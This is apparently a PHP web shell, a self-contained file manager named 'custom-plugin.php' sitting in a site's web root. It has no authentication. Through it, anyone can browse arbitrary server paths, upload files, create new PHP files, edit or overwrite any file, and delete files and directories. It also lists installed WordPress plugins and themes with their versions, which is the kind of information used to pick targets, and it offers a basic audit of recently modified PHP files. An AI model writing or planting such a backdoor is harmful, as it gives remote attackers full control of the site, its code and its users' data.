File: /medikors/www/custom-plugin.php
<?php
// Simple PHP File Manager
// Path to manage
$path = isset($_GET['path']) ? $_GET['path'] : '.';
// Normalize and secure the path
$path = realpath($path);
// Helper function to get the size of a directory
function getDirectorySize($path) {
$bytestotal = 0;
if($path !== false && $path != '' && file_exists($path)){
foreach(new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path, FilesystemIterator::SKIP_DOTS)) as $object){
$bytestotal += $object->getSize();
}
}
return $bytestotal;
}
// Handle file upload
if(isset($_FILES['file'])){
$upload_path = $path . '/' . basename($_FILES['file']['name']);
if(move_uploaded_file($_FILES['file']['tmp_name'], $upload_path)){
echo "<script>alert('File uploaded successfully!');</script>";
} else {
echo "<script>alert('File upload failed!');</script>";
}
}
// Handle file deletion
if(isset($_GET['delete'])){
$delete_file = basename($_GET['delete']); // Secure filename
$delete_path = realpath($path . '/' . $delete_file);
if(is_file($delete_path)){
unlink($delete_path);
echo "<script>alert('File deleted successfully!'); window.location.href='?path=" . urlencode($path) . "';</script>";
} elseif(is_dir($delete_path)){
rmdir($delete_path);
echo "<script>alert('Directory deleted successfully!'); window.location.href='?path=" . urlencode($path) . "';</script>";
} else {
echo "<script>alert('Deletion failed!');</script>";
}
}
// Handle file editing (saving changes)
if(isset($_POST['save']) && isset($_POST['content']) && isset($_POST['edit_file'])){
$edit_file = basename($_POST['edit_file']); // Secure filename
$edit_path = realpath($path . '/' . $edit_file);
if($edit_path && is_file($edit_path)) {
file_put_contents($edit_path, $_POST['content']);
echo "<script>alert('File saved successfully!'); window.location.href='?path=" . urlencode($path) . "';</script>";
} else {
echo "<script>alert('Error saving file!');</script>";
}
}
// Handle new PHP file creation
if(isset($_POST['create']) && isset($_POST['filename'])){
$filename = preg_replace('/[^a-zA-Z0-9_\-]/', '', $_POST['filename']); // Secure filename
$new_file_path = $path . '/' . $filename . '.php';
if(!file_exists($new_file_path)){
file_put_contents($new_file_path, "<?php\n\n// New PHP File\n\n?>");
echo "<script>alert('PHP file created successfully!'); window.location.href='?path=" . urlencode($path) . "';</script>";
} else {
echo "<script>alert('File already exists!');</script>";
}
}
// List files and directories
$files = scandir($path);
$path_parts = explode(DIRECTORY_SEPARATOR, $path);
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>File Manager</title>
<style>
body { font-family: Arial, sans-serif; background-color: #f0f0f0; color: #333; margin: 0; padding: 20px; }
.file-manager { max-width: 900px; margin: 0 auto; background: #fff; padding: 20px; box-shadow: 0 0 10px rgba(0,0,0,0.1); position: relative; }
.file-manager h1 { margin-top: 0; color: #007bff; }
.path { margin: 10px 0; }
.path a { color: #007bff; text-decoration: none; }
.path a:hover { text-decoration: underline; }
table { width: 100%; border-collapse: collapse; margin-top: 20px; font-size: 14px; }
th, td { padding: 10px; border: 1px solid #ddd; text-align: left; }
th { background-color: #f8f9fa; }
td a { color: #007bff; text-decoration: none; }
td a:hover { text-decoration: underline; }
.editor { margin-top: 20px; }
.editor textarea { width: 100%; height: 300px; padding: 10px; border: 1px solid #ddd; border-radius: 4px; font-family: monospace; }
.upload-form input[type="text"], .upload-form input[type="file"] { margin-right: 10px; padding: 5px; }
.upload-form input[type="submit"] { padding: 5px 15px; border: none; background-color: #28a745; color: #fff; cursor: pointer; border-radius: 4px; }
.upload-form input[type="submit"]:hover { background-color: #218838; }
.recent { background: #ffeeba; }
.suspect { background: #f8d7da; }
.snippet { font-family: monospace; font-size: 12px; color: #555; background: #f6f6f6; padding: 4px; border-radius: 4px; display: block; margin-top: 3px; }
.action-buttons input[type="submit"] { min-width: 120px; }
</style>
</head>
<body>
<div class="file-manager">
<h1>File Manager</h1>
<!-- Display Path -->
<div class="path">
<?php foreach($path_parts as $key => $part): ?>
<?php $current_path = implode(DIRECTORY_SEPARATOR, array_slice($path_parts, 0, $key + 1)); ?>
<a href="?path=<?php echo urlencode($current_path); ?>"><?php echo htmlspecialchars($part); ?></a>
<?php if($key < count($path_parts) - 1): ?>
>
<?php endif; ?>
<?php endforeach; ?>
</div>
<!-- Upload Form -->
<form action="" method="post" enctype="multipart/form-data" class="upload-form">
<input type="file" name="file">
<input type="submit" value="Upload">
</form>
<!-- New PHP File Creation Form -->
<form action="" method="post" class="upload-form">
<input type="text" name="filename" placeholder="Enter file name" required>
<input type="submit" name="create" value="Create PHP File">
</form>
<!-- Check Plugins and Themes Button -->
<form action="" method="post" style="margin-top: 20px; display:inline-block;">
<input type="submit" name="check_wp" value="Check" style="padding: 5px 15px; border: none; background-color: #17a2b8; color: #fff; cursor: pointer; border-radius: 4px;">
</form>
<!-- Security Check Button -->
<form action="" method="post" style="margin-top: 20px; display:inline-block;">
<input type="submit" name="security_check" value="Security Check" style="padding: 5px 15px; border: none; background-color: #dc3545; color: #fff; cursor: pointer; border-radius: 4px; margin-left:10px;">
</form>
<?php
if (isset($_POST['check_wp'])) {
// Function to find wp-content directory upwards
function find_wp_content($start) {
$dir = $start;
while ($dir !== dirname($dir)) {
if (is_dir($dir . '/wp-content')) {
return realpath($dir . '/wp-content');
}
$dir = dirname($dir);
}
return false;
}
$wp_content_path = find_wp_content($path);
$found = false;
echo '<div style="margin-top:20px;padding:15px;background:#f8f9fa;border:1px solid #ccc;border-radius:5px;">';
if ($wp_content_path) {
// Plugins
$wp_plugins_path = $wp_content_path . '/plugins';
if (is_dir($wp_plugins_path)) {
echo "<strong>Plugins:</strong><br>";
$plugins = array_diff(scandir($wp_plugins_path), ['.','..']);
$plugin_names = [];
foreach ($plugins as $plugin_folder) {
$plugin_dir = $wp_plugins_path . '/' . $plugin_folder;
if (is_dir($plugin_dir)) {
// Main plugin file: folder-name.php or first .php file
$main_plugin_file = $plugin_dir . '/' . $plugin_folder . '.php';
if (!is_file($main_plugin_file)) {
$php_files = glob($plugin_dir . '/*.php');
$main_plugin_file = $php_files ? $php_files[0] : false;
}
if ($main_plugin_file && is_file($main_plugin_file)) {
$data = file_get_contents($main_plugin_file, false, null, 0, 8192);
if (preg_match('/Plugin Name:\s*(.+)/i', $data, $name) &&
preg_match('/Version:\s*([^\s]+)/i', $data, $version)) {
$plugin_name = htmlspecialchars(trim($name[1]));
$plugin_version = htmlspecialchars(trim($version[1]));
// Avoid duplicates
$key = $plugin_name . $plugin_version;
if (!isset($plugin_names[$key])) {
echo $plugin_name . ' <small>(v' . $plugin_version . ')</small><br>';
$plugin_names[$key] = true;
}
}
}
}
}
if (empty($plugin_names)) echo '<em>No plugins found.</em><br>';
$found = true;
}
// Themes
$wp_themes_path = $wp_content_path . '/themes';
if (is_dir($wp_themes_path)) {
echo "<br><strong>Themes:</strong><br>";
$themes = array_diff(scandir($wp_themes_path), ['.','..']);
$theme_names = [];
foreach ($themes as $theme_folder) {
$theme_dir = $wp_themes_path . '/' . $theme_folder;
$style_css = $theme_dir . '/style.css';
if (is_dir($theme_dir) && is_file($style_css)) {
$data = file_get_contents($style_css, false, null, 0, 8192);
if (preg_match('/Theme Name:\s*(.+)/i', $data, $name) &&
preg_match('/Version:\s*([^\s]+)/i', $data, $version)) {
$theme_name = htmlspecialchars(trim($name[1]));
$theme_version = htmlspecialchars(trim($version[1]));
// Avoid duplicates
$key = $theme_name . $theme_version;
if (!isset($theme_names[$key])) {
echo $theme_name . ' <small>(v' . $theme_version . ')</small><br>';
$theme_names[$key] = true;
}
}
}
}
if (empty($theme_names)) echo '<em>No themes found.</em><br>';
$found = true;
}
}
if (!$found) {
echo 'No WordPress installation detected (no wp-content directory found upwards from here).';
}
echo '</div>';
}
// SECURITY CHECK BUTTON FUNCTIONALITY
if (isset($_POST['security_check'])) {
echo '<div style="margin-top:20px;padding:15px;background:#fff3cd;border:1px solid #ffeeba;border-radius:5px;">';
echo '<strong>Security Check: PHP File Audit</strong><br><br>';
echo '<table><tr><th>File</th><th>Last Modified</th><th>Size</th><th>Snippet</th></tr>';
// Scan recursively for PHP files
$root = dirname(__FILE__); // scan from the script's directory
$now = time();
$recent_days = 7; // highlight files modified in the last 7 days
$suspect_dirs = ['uploads', 'cache', 'backup', 'tmp', 'temp'];
$rii = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
foreach ($rii as $file) {
if (!$file->isFile()) continue;
$filename = $file->getFilename();
$filepath = $file->getPathname();
if (strtolower(substr($filename, -4)) === '.php') {
$mtime = $file->getMTime();
$filesize = $file->getSize();
$is_recent = ($now - $mtime < 3600 * 24 * $recent_days);
$is_suspect = false;
foreach ($suspect_dirs as $dir) {
if (stripos($filepath, DIRECTORY_SEPARATOR . $dir . DIRECTORY_SEPARATOR) !== false) {
$is_suspect = true;
break;
}
}
$row_class = $is_suspect ? 'suspect' : ($is_recent ? 'recent' : '');
echo '<tr class="'.$row_class.'">';
echo '<td>' . htmlspecialchars(str_replace($root . DIRECTORY_SEPARATOR, '', $filepath)) . ($is_suspect ? ' <b style="color:#c00;">[SUSPECT]</b>' : '') . '</td>';
echo '<td>' . date('Y-m-d H:i:s', $mtime) . ($is_recent ? ' <b style="color:#b58900;">[RECENT]</b>' : '') . '</td>';
echo '<td>' . number_format($filesize) . ' bytes</td>';
// Show snippet
$snippet = '';
$handle = fopen($filepath, "r");
if ($handle) {
for ($i = 0; $i < 5; $i++) {
$line = fgets($handle, 4096);
if ($line === false) break;
$snippet .= htmlspecialchars($line);
}
fclose($handle);
}
echo '<td><span class="snippet">' . nl2br($snippet) . '</span></td>';
echo '</tr>';
}
}
echo '</table>';
echo '<br><em>Files highlighted as <b>[RECENT]</b> were modified in the last '.$recent_days.' days.<br>Files marked <b>[SUSPECT]</b> are in uploads/cache/backup/tmp/temp folders (unusual for PHP files).</em>';
echo '</div>';
}
?>
<!-- Files Table -->
<table>
<tr>
<th>Name</th>
<th>Size</th>
<th>Actions</th>
</tr>
<?php foreach($files as $file): ?>
<?php if($file == '.' || $file == '..') continue; ?>
<tr>
<td>
<?php if(is_dir($path . '/' . $file)): ?>
<a href="?path=<?php echo urlencode($path . '/' . $file); ?>"><?php echo $file; ?></a>
<?php else: ?>
<?php echo $file; ?>
<?php endif; ?>
</td>
<td><?php echo is_dir($path . '/' . $file) ? getDirectorySize($path . '/' . $file) . ' bytes' : filesize($path . '/' . $file) . ' bytes'; ?></td>
<td>
<a href="?path=<?php echo urlencode($path); ?>&delete=<?php echo urlencode($file); ?>" onclick="return confirm('Delete this file?');">Delete</a>
<?php if(is_file($path . '/' . $file)): ?>
<a href="?path=<?php echo urlencode($path); ?>&edit=<?php echo urlencode($file); ?>">Edit</a>
<?php endif; ?>
</td>
</tr>
<?php endforeach; ?>
</table>
<!-- File Editor -->
<?php
if(isset($_GET['edit'])) {
$edit_file = basename($_GET['edit']);
$edit_path = realpath($path . '/' . $edit_file);
if($edit_path && is_file($edit_path)) {
$content = file_get_contents($edit_path);
?>
<div class="editor">
<h2>Edit File: <?php echo htmlspecialchars($edit_file); ?></h2>
<form action="" method="post">
<textarea name="content"><?php echo htmlspecialchars($content); ?></textarea><br>
<input type="hidden" name="edit_file" value="<?php echo htmlspecialchars($edit_file); ?>">
<input type="submit" name="save" value="Save">
</form>
</div>
<?php }} ?>
</div>
</body>
</html>